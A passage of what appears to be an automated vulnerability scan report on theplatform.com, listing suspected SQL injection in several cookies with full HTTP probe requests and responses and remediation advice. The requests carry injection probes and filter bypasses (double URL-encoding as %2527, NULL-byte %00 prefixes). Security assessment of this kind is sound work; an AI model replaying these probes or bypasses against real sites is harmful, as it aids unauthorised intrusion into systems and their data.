ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865617; expires=Thu, 04-Oct-2012 18:46:57 GMT; path=/
Location: http://theplatform.com/search/noresults/deac691353c6d300858204d3decac5e8/
Content-Length: 0
Connection: close
Content-Type: text/html


1.5. http://theplatform.com/ [ReleaseDeliveryTime cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The ReleaseDeliveryTime cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleaseDeliveryTime cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ReleaseDeliveryTime cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889%2527; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865595; expires=Thu, 04-Oct-2012 18:46:35 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889%2527%2527; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865596; expires=Thu, 04-Oct-2012 18:46:36 GMT; path=/
Location: http://theplatform.com/search/noresults/a6cf2cb1d50de87ac9dec1cd229e7342/
Content-Length: 0
Connection: close
Content-Type: text/html


1.6. http://theplatform.com/ [ReleasePID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The ReleasePID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleasePID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ReleasePID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe%2527; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865592; expires=Thu, 04-Oct-2012 18:46:32 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe%2527%2527; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865593; expires=Thu, 04-Oct-2012 18:46:33 GMT; path=/
Location: http://theplatform.com/search/noresults/280ec738c8bd42cc793a1a4ea2ac5b11/
Content-Length: 0
Connection: close
Content-Type: text/html


1.7. http://theplatform.com/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1%00'; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865577; expires=Thu, 04-Oct-2012 18:46:17 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1%00''; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865578; expires=Thu, 04-Oct-2012 18:46:18 GMT; path=/
Location: http://theplatform.com/search/noresults/961ab77bab4b2d5604804a70f6b7d777/
Content-Length: 0
Connection: close
Content-Type: text/html


1.8. http://theplatform.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451%00'

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865608; expires=Thu, 04-Oct-2012 18:46:48 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451%00''

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865609; expires=Thu, 04-Oct-2012 18:46:49 GMT; path=/
Location: http://theplatform.com/search/noresults/b5475a59a34972037dab9efa7ffa0729/
Content-Length: 0
Connection: close
Content-Type: text/html


1.9. http://theplatform.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)%00'; exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865586; expires=Thu, 04-Oct-2012 18:46:26 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)%00''; exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865587; expires=Thu, 04-Oct-2012 18:46:27 GMT; path=/
Location: http://theplatform.com/search/noresults/56ead3789b557f1946006e6dc5102b8a/
Content-Length: 0
Connection: close
Content-Type: text/html


1.10. http://theplatform.com/ [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450%2527; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865599; expires=Thu, 04-Oct-2012 18:46:39 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450%2527%2527; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865600; expires=Thu, 04-Oct-2012 18:46:40 GMT; path=/
Location: http://theplatform.com/search/noresults/8f71647bed1357fbed35d9783d049c63/
Content-Length: 0
Connection: close
Content-Type: text/html


1.11. http://theplatform.com/ [exp_last_visit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_visit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
